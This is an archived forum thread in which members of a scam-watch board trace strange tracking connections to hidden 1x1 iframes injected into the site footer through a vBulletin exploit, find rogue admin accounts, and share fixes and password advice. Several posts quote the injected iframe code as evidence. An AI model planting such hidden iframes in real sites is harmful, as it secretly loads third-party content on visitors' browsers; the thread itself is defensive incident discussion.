PDA

View Full Version : Strange Connections



wserra
09-04-2013, 06:38 PM
I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.

When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.

In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image (http://www.mirror-image.com/)". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.

You guys know about this?

littleroundman
09-04-2013, 07:47 PM
Your concerns are not strange at all, Wes.

I'm not sure why McAfee is blocking mirror-image.com. My security software is not.

mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites

Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods


FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.

This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic heavy pages loading slowly (as happens in any of the graphic heavy posts in the cash gifting subforum (http://www.realscam.com/f42/) here on REALSCAM.com (http://www.realscam.com)

As I post, the forum is linking to:

ajaxgoogleapis.com
ajax.googleapis.com (http://ajax.googleapis.com) is a CDN repository for the popular jquery javescript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work

damnxd.com
We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.

jobless-jack.com
Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN

weirdstuffs.com
BBM Display Pictures | Facebook Covers | Jokes

Facebook.com

Google.com

I would encourage anyone using Firefox who is concerned with cross-site requests to install the Request Policy (https://www.requestpolicy.com/) Firefox addon
RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy (https://www.requestpolicy.com/privacy.html), security (https://www.requestpolicy.com/security.html), and speed by giving you control over cross-site requests.

wserra
09-04-2013, 08:22 PM
lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.

I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.

Thanks for your reply, LRM, but I still think it's strange.

littleroundman
09-04-2013, 08:47 PM
That's strange, Wes.

I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.

We'll check it out.

Thanks for the info

Whip
09-05-2013, 09:35 PM
I had an 'ad.yieldmanager' popup on my phone from here the other day.

ribshaw
09-05-2013, 10:32 PM
OK, I have had this happen twice, ads have started to play on my computer. Almost like a video ad. As soon as I shut down the site, the ad stops. Happened yeterday and just a second ago.

wserra
09-06-2013, 08:52 AM
It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?

ProfHenryHiggins
09-06-2013, 09:00 AM
I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
Could something have slipped past Jason and gotten imbedded? Or another 1 pixel graphic like MMB pulled on us a while back?


On the other hand, I don't get the video ad popup, probably due to how my system is set up.

Soapboxmom
09-06-2013, 09:21 AM
A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.

As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!

NikSam
09-06-2013, 09:32 AM
There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from jobless-jack.com
and damnxd.org (and this is on a page which does not have any non stock images)

5786


Jason, what is a purpose of having these iframe lines included in forum.php ?



<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>

</div>


The comment about "do not remove" looks very fishy to me

wserra
09-09-2013, 01:40 PM
The same thing is happening from my office computer.

Fendaril
09-09-2013, 08:14 PM
All this does make me miss the simple times and my dial phone just a wee bit!

I was never alive for the simple times, but I feel ya.

Whip
09-09-2013, 10:19 PM
I don't automatically accept cookies so I get to see these just asked to be set when I tried to access this site from a different computer:

widget3.linkwithin.com
widget5.linkwithin.com
widget6.linkwithin.com
jobless-jack.com
damnxd.org
whos.amung.us
rc.rlcdn.com
lb.adnxs.com
idsync.rlcdn.com

scratchycat
09-11-2013, 02:17 PM
There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from jobless-jack.com
and damnxd.org (and this is on a page which does not have any non stock images)

5786


Jason, what is a purpose of having these iframe lines included in forum.php ?



<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>

</div>


The comment about "do not remove" looks very fishy to me

Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.

NikSam
09-13-2013, 06:06 AM
So, anybody gonna remove that infected HTML code ?

as VB original template shows:


<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
</div>


Those infectious iframes are more likely coming from vboptions.copyrighttext variable.
and resulting in:


<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>

</div>


Please verify that this code was put by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text

And change admin passwords. (might also have come from penetrating MySQL db)

NikSam
09-13-2013, 06:30 AM
UPDATE: It seems to be VB exploit, so make sure to install latest fixes, so it doesn't not happen again after removal of Copyright Text,
check for suspicious new admin accounts, php files which appeared not from stock VBulletin setup, and modifications to stock php files.

https://forums.digitalpoint.com/threads/site-exploited-by-recent-0-day-reported-by-vbulletin-ad-code-inserted.2679354/


to remove Copyright Text as pointed out there:


You should've able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.



more details on the exploit: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5

Soapboxmom
09-13-2013, 07:02 AM
Thanks for the info. We will get the owner on it this weekend.

wserra
09-13-2013, 08:08 AM
See the PC World article (http://www.pcworld.com/article/2047787/vbulletin-users-warned-of-potential-exploit.html) as well. Especially this part:
It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.

Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.

I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.

And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.

I would even consider shutting down the board until this is fixed.

NikSam
09-13-2013, 08:43 AM
... I suggest that users must view their passwords to this site as compromised ...

Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.

But I agree, as a general rule never use the same password for different sites, get a password management program if you must,
or at least come up with a scheme to generate pass for sites (like for GMail - mypass_gm)
Most critical password a person has is to their email , even if you think there is nothing else worth reading for someone, it can be used
to reset your passwords on other sites (Banks, Paypal, etc.)

wserra
09-13-2013, 09:00 AM
Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.

So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?

NikSam
09-13-2013, 09:08 AM
Ok, i Already spotted new created Administrators:
View Profile: . (http://www.realscam.com/members/-/)
View Profile: sky22 (http://www.realscam.com/members/sky22/)

wserra
09-13-2013, 09:15 AM
Ok, i Already spotted new created Administrators:
View Profile: . (http://www.realscam.com/members/-/)
View Profile: sky22 (http://www.realscam.com/members/sky22/)

Both created last week.

Dum-da-DUM-DUM.

ribshaw
09-13-2013, 09:16 AM
Would someone update, the non techy users as to what this means and a course of action. I am running AVG internet security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but have no idea what any of this means behind the scenes.

NikSam
09-13-2013, 09:20 AM
Ribshaw, your protections are only good for your own PC.

The RS itself been compromised/hacked/penetrated exploiting
a programming mistake in VBulletin software on which this forum runs on.

Whoever did put those hidden iframes are just generating views to their ads, even that you cannot see those ads (they hidden in two 1x1 frames in the bottom which are invisible)

But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes and perhaps already did too.
They can steal database of users, install additional backdoors, modify content, etc...

wserra
09-13-2013, 09:52 AM
Think of it as RS having gained two new admins from the Russian mob.

NikSam
09-13-2013, 10:03 AM
Think of it as RS having gained two new admins from the Russian mob.

And a Russian guy (such as me) spotted them first.
same mentality ?

wserra
09-13-2013, 10:49 AM
same mentality ?

Да никогда, приятель!

EagleOne
09-13-2013, 02:37 PM
If they can already access your password for RS, what good does it do to change it? They would still be able to get the new one, wouldn't they? If so, need to wait until it is fixed, then reset a new password and then change that password if used on other sites, etc.. Make sense, or just ignorant of how this all works?

wserra
09-13-2013, 03:06 PM
If they can already access your password for RS, what good does it do to change it? They would still be able to get the new one, wouldn't they?


if you use your RS password for anything else that matters to you, you ought to change the others.Emphasis supplied.

ribshaw
09-13-2013, 03:33 PM
As a tip on the whole password thing that I thought was brilliant, but then... I set up separate passwords for every account I have, generally 12 + letters plus numbers. Nonsense stuff like 5ksjel48frl248, obviously I had to write them down, then I set my windows password to something hard to crack but easy for me to remember so it does not have to be written down. Of course most cyber attacks will come from external sources, but if someone busts in my office and finds the password list they will still be SOL.

wserra
09-14-2013, 07:30 AM
As a tip on the whole password thing

Two other tips: KeePass (http://keepass.info/). DashLane (https://www.dashlane.com/). I use the latter.

littleroundman
09-14-2013, 09:34 AM
Another excellent free password manager browser addon is LastPass (https://lastpass.com/)

ribshaw
09-14-2013, 11:16 AM
Another excellent free password manager browser addon is LastPass (https://lastpass.com/)

Most of my non financial sites RS, Gmail, FB etc the passwords are stored with the browser somehow. On financial sites the none of my passwords are stored and the sites usually have some additional level of browser protection (prompting additional questions from a different IP upon log in). My question is with one of the password managers, what happens if your computer becomes compromised? Could someone not then log in as if they were you?

wserra
09-14-2013, 11:25 AM
My question is with one of the password managers, what happens if your computer becomes compromised? Could someone not then log in as if they were you?

DashLane (and I think KeePass and LastPass as well) has a master password you need to enter once to start the app. It's the only one you need to remember.

wserra
09-14-2013, 11:31 AM
BTW, I see you guys got rid of the new admins. You should be aware that I still get all the connections that made me start the thread, though. There is pretty clearly some rogue code still floating around, which may well allow hacker to make new new admins.

Fendaril
09-14-2013, 12:19 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

path2prosperity
09-14-2013, 12:39 PM
Just blame everything on Ken Russo.


Or BoggyBoy Fiedur!

My bet is on BoggyBoy as Ken can not speak Russian and probably does not know the crylic alphabet

baylee
09-14-2013, 01:49 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

I hope your wrong also but it makes a lot of sense.

ribshaw
09-14-2013, 04:35 PM
Perhaps this is one of the new admins. They sent me a message over on Facebook, some gibberish. When I check his friends list, shock of all shockers many claim to be hackers or have that Guy Fawkes mask as their profile pic. https://www.facebook.com/farenzy.turke

Good thing Facebook takes things seriously.

5846

Fendaril
09-14-2013, 05:35 PM
What grand scheme did you guys uncover to garner a fan base that is willing to take over ownership of a scam board full of people who use ad-blocker anyway.

littleroundman
09-14-2013, 08:53 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

Believe me, the forum is constantly under multiple forms of attack.

The fact readers don't see it and we don't talk about it doesn't mean it isn't happening.

We must be doing something right. :RpS_wink:

EagleOne
09-15-2013, 01:15 AM
Well, the site still loads slow for me, as well as accessing the threads. I was hoping once this issue was fixed that would solve the problem. I keep running scans (malware and virus) thinking it might be at my end, but my system is safe. I ran four different virus programs and nothing found. Anyone else having the site load slow for them, or am I the only one?

littleroundman
09-15-2013, 01:37 AM
The boss is in his counting house, counting out his money upgrading the software as we speak, so most of the problems should be fixed.

Other than that, the forum is loading normally for me.

NikSam
09-15-2013, 03:45 AM
127.0.0.1 damnxd.org www.jobless-jack.com


As a temporary solution, everyone can add this line to their hosts file
it will break connections to those ad sites .
Location of hosts file:

WIN - C:/Windows/System32/drivers/etc/hosts
MAC & LINUX - /etc/hosts

more info: Patching the Hosts File to Stop Hackers and Block Websites | PC Memoirs (http://pcmemoirs.com/2011/07/07/patching-the-hosts-file-to-stop-hackers-and-block-websites/)

ProfHenryHiggins
09-15-2013, 04:00 AM
Still seeing the odd extra sites loading.

adminrealscam
09-15-2013, 10:55 AM
Removed the code below from the footer templates.

<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
{vb:raw template_hook.footer_copyright}
</div>

The hackers that created admin accounts using the upgrade.php hole must have added this code to the footer templates.
Firefox is no longer showing these redirects at the bottom of each page.

adminrealscam
09-15-2013, 12:38 PM
Well that was dumb. The place where the injected crap was put in the copyright text in the AdminCP. Just took friggin forever to figure this one out.

Site Name / URL / Contact Details

EagleOne
09-15-2013, 01:05 PM
Thanks for fixing it! Now it loads like always....FAST! Tell everyone involved thanks for fixing this. It is appreciated.

NikSam
09-15-2013, 02:45 PM
Well that was dumb. The place where the injected crap was put in the copyright text in the AdminCP. Just took friggin forever to figure this one out.

Site Name / URL / Contact Details

Forever? i told exactly that it is in copyrighttext variable

every other site infected with those iframes been done same way

Fendaril
09-15-2013, 04:06 PM
Well at-least it didn't take almost a month to fix like the DDoS.

So it looks like some wannabe hackers exploited a common bug that was passed around the hacker community. They probably just read some guide on how to break v-bulletin(insert version here) and got supa-excited about it!

It took all but a few days to fix it, and now RS has more publicity. Brilliant plan Russian geek squad crew.

adminrealscam
09-15-2013, 05:53 PM
Forever? i told exactly that it is in copyrighttext variable

every other site infected with those iframes been done same way


You the man NikSam.
Once I read through all the posts and read yours I was able to remove the crap. Forever to me is more than 30min.